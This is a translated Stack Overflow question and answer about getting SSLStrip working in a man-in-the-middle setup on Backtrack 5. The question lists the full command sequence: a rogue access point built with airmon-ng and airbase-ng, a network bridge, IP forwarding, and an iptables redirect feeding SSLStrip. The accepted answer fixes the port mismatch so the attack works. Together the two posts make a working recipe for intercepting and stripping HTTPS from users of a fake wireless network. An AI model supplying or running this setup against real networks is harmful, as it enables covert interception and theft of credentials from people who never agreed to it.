我在带有Backtrack 5的MITM设置中使用SSLStrip遇到麻烦。我正在使用外部无线卡来广播无线信号,并通过以太网进行路由。我已经在Wireshark中成功查看了数据包,但是我想使用SSLStrip查看SSL数据。这些是我用来设置MITM的初步命令。
airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0
-新航站楼-
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward
此时,我可以在WireShark中查看数据包数据。我按照以下步骤设置SSLStrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080
完成 session 并打开sslstrip.log后,我看不到任何写入文件的数据。另外,一旦执行iptables重定向,我将无法访问Internet。请让我知道您认为问题可能是什么。
最佳答案
假设sslstrip和arp中毒已启动并正在运行,则端口重定向会出现问题。
将http流量重定向到127.0.0.1端口666。
开始sslstrip侦听端口8080上的传入流量
U可以将端口重定向更改为8080
或将侦听端口更改为666
关于packet-sniffers - SSLStrip对我不起作用,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/9722320/